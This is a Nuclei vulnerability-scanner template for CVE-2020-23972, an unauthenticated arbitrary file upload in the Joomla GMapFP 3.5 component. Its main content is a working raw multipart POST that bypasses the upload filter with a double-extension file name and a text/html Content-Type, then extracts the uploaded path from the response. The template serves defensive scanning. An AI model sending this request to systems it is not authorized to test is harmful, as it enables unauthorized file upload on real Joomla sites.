nuclei-templates/http/cves/2020/CVE-2020-23972.yaml

70 lines
2.7 KiB
YAML

id: CVE-2020-23972
info:
name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
author: dwisiswant0
severity: high
description: |
Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
remediation: |
Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/49129
- https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
- http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-23972
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2020-23972
cwe-id: CWE-434
epss-score: 0.61117
epss-percentile: 0.97491
cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
metadata:
max-request: 2
vendor: gmapfp
product: gmapfp
framework: joomla\!
tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
variables:
name: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: {{BaseURL}}
Connection: close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="option"
com_gmapfp
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"
Content-Type: text/html
projectdiscovery
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="no_html"
no_html
------WebKitFormBoundarySHHbUsfCoxlX1bpS--
payloads:
component:
- "com_gmapfp"
- "comgmapfp"
extractors:
- type: regex
regex:
- "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
part: body
# digest: 4b0a00483046022100a93ba81c26efa23beddc2f9a7350f2c559e04829f2ad5806e38615170de3824d02210096a1ce6a5faabe487255a8b526fd283b1e60e35bed0a3f9bb98854bec62b7d5c:922c64590222798bb761d5b6d8e72950